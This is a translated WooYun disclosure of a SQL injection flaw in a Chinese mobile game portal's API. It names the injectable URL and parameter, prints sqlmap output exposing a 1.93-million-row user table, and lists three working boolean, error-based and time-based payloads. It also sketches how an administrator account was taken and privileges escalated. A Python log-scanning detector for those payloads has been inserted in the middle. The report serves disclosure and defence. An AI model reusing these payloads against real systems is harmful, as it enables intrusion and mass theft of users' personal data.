Vulnerability Summary
Defect ID: WooYun-2016-179486
Title: SQL injection and privilege escalation on a mobile game portal site
Vendor: Hangzhou Kuaiding Network Co., Ltd. (杭州快定网络股份有限公司)
Author: sysALong
Submitted: 2016-02-29 15:58
Published: 2016-04-14 15:58
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: Vendor could not be contacted, or vendor actively ignored the report
Source: www.wooyun.org; for questions or help please contact
Tags: Mysql
Vulnerability Details
Disclosure status:
2016-02-29: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-04-14: Vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
A company's mobile game portal website
Detailed description:
Injection point: http://api.a.7xz.com:80/v181/newhtmldetail?gameid=dhhsdw&newsid=161156&frm=ngnews
[11:41:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5
[11:41:27] [INFO] resumed: 1931861
Database: new_bbs
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| pre_ucenter_members | 1931861 |
+---------------------+---------+
That's 1.93 million user records.
Proof of vulnerability:
Parameter: gameid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameid=dhhsdw' AND 3297=3297 AND 'Obqq'='Obqq&newsid=161156
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: gameid=dhhsdw' AND (SELECT 8395 FROM(SELECT COUNT(*),CONCAT(0x71786a7871,(SELECT (ELT(8395=8395,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dYet'='dYet&newsid=161156
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gameid=dhhsdw' AND (SELECT * FROM (SELECT(SLEEP(5)))zaCE) AND 'bzJZ'='bzJZ&newsid=161156
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
available databases [148]:
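As an added example (not part of the original report or the site's own code), here is a detection pass a defender could run over Nginx access logs to flag the three sqlmap techniques confirmed above, boolean-based blind, error-based (FLOOR/RAND/GROUP BY) and time-based blind (SLEEP); it checks every query parameter, not only gameid. The log lines are constructed, and the client IP, timestamp and user agent are assumptions.

```python
import re
from urllib.parse import quote, urlsplit, parse_qsl

# Signatures for the three sqlmap techniques listed in the report.
# Each regex runs on the URL-decoded parameter value.
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*AND\s+(\d+)\s*=\s*\1(?!\d)", re.I),
    "error-based": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?GROUP\s+BY", re.I | re.S),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+(\.\d+)?\s*\)", re.I),
}

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def classify_value(value: str) -> list:
    """Return the names of every signature matching one decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan_access_log(log_text: str) -> list:
    """Parse Nginx combined-format lines and flag parameters carrying injection
    signatures. Returns (line_no, parameter, [techniques]) tuples."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        target = urlsplit(m.group(1))
        # parse_qsl percent-decodes values; keep_blank_values keeps empty params
        for param, value in parse_qsl(target.query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                findings.append((line_no, param, hits))
    return findings


# Constructed sample log (combined format, assumed IP/UA); gameid values mirror the report.
_LINE = ('203.0.113.5 - - [29/Feb/2016:11:41:27 +0800] "GET /v181/newhtmldetail?gameid={}'
         '&newsid=161156&frm=ngnews HTTP/1.1" 200 5120 "-" "Mozilla/5.0"')
SAMPLE_LOG = "\n".join(_LINE.format(quote(v, safe="")) for v in [
    "dhhsdw",                                                   # legitimate request
    "dhhsdw' AND 3297=3297 AND 'Obqq'='Obqq",                   # boolean-based blind
    "dhhsdw' AND (SELECT 8395 FROM(SELECT COUNT(*),CONCAT(0x71786a7871,"
    "(SELECT (ELT(8395=8395,1))),0x7176627871,FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dYet'='dYet",  # error-based
    "dhhsdw' AND (SELECT * FROM (SELECT(SLEEP(5)))zaCE) AND 'bzJZ'='bzJZ",    # time-based
])

if __name__ == "__main__":
    for line_no, param, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: parameter {param!r} -> {', '.join(hits)}")
```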
Finally, the administrator account and password were obtained.
Then privilege escalation... that took some twists and turns: none of the directories were writable, so even ROOT privileges were no use... but in the very end... see this article...
WooYun: phpcms v9 backend remote code execution vulnerability (part 3). Since I had the account and password, CMD5 decryption.
Just write it in...
Fix recommendation:
In the end I found that, before I got here, some big shot had already passed through... I just retraced the path they took...
Hurry up and fix it. That's 1.93 million user records; they were probably dumped clean long ago...
Copyright notice: please credit the source when reposting: sysALong@WooYun
Vulnerability Response
Vendor response:
Unable to contact the vendor, or the vendor actively declined
Vulnerability Rank: 15 (WooYun rating)